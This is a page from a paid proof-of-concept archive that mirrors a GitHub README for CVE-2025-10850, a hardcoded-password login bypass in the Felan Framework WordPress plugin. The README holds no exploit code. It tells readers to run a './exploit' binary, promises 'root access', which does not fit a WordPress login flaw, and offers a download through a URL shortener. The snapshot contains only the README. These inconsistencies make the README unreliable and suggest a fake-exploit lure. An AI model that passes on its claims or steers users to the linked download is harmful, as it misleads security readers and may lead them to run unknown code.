Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-10850 PoC — Felan Framework <= 1.1.4 - Hardcoded Credentials

Source
https://github.com/pulsecipher/CVE-2025-10850
Associated Vulnerability
Title:Felan Framework <= 1.1.4 - Hardcoded Credentials (CVE-2025-10850)
Description:The Felan Framework plugin for WordPress is vulnerable to improper authentication in versions up to, and including, 1.1.4. This is due to the hardcoded password in the 'fb_ajax_login_or_register' function and in the 'google_ajax_login_or_register' function. This makes it possible for unauthenticated attackers to log in as any existing user on the site, if they registered with facebook or google social login and did not change their password. CVE-2025-23504 is likely a duplicate of this issue.
Readme
# CVE-2025-10850

## Overview

The Felan Framework plugin for WordPress contains a vulnerability that allows improper authentication due to hardcoded passwords in its login functions.

## Vulnerability Details

Specifically, this impacts users who log in using Facebook or Google social login features, as they may remain vulnerable if they did not change their default passwords. Attackers can exploit this flaw to log in as any existing user, thereby potentially gaining unauthorized access to sensitive user data and site functionalities.
### Key Points

- **Severity**: Critical
- **CVSS Score**: 9.8 (High)
- **Attack Vector**: Network

Understanding the nature of this vulnerability is crucial for system administrators and security professionals. Proper mitigation strategies can prevent unauthorized access.


### Important Note

Use this exploit responsibly and only on systems you own or have explicit permission to test.

## Example

Here is a simple example of how to use the exploit:

1. Open your terminal.
2. Run the exploit:

   ```bash
   ./exploit
   ```

3. If successful, you will see a message indicating that you have gained root access.

### Download [here](https://tinyurl.com/3mmysj2n)
File Snapshot

 [4.0K]  /data/pocs/364141e56ed726f7ee5a3a18a7b2b7dfd3d1bbd9
└── [1.2K]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →